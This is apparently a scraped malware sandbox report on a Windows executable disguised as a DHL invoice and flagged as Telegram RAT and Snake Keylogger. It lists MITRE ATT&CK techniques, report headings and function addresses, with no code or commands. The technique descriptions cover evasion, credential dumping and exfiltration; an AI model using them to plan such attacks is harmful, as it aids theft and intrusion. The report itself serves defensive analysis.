Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice DHL - AWB 2024 E4001 - 0000731.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Invoice DHL - AWB 2024 E4001 - 0000731.exe

Function 05394FE8 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Function 053973C8 Relevance: 3.8, Strings: 2, Instructions: 1339
COMMON

Function 0523B448 Relevance: 3.1, Strings: 2, Instructions: 617
COMMON

Function 05C2A790 Relevance: 4.2, Strings: 3, Instructions: 480
COMMON

Function 05C2C448 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Function 05C26CF9 Relevance: 3.0, Strings: 2, Instructions: 484
COMMON

Function 053C29D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Function 05C29E40 Relevance: 2.8, Strings: 2, Instructions: 349
COMMON

Function 053C26A8 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Function 00A53991 Relevance: 2.7, Strings: 2, Instructions: 224
COMMON

Function 05C28879 Relevance: 2.7, Strings: 2, Instructions: 178
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre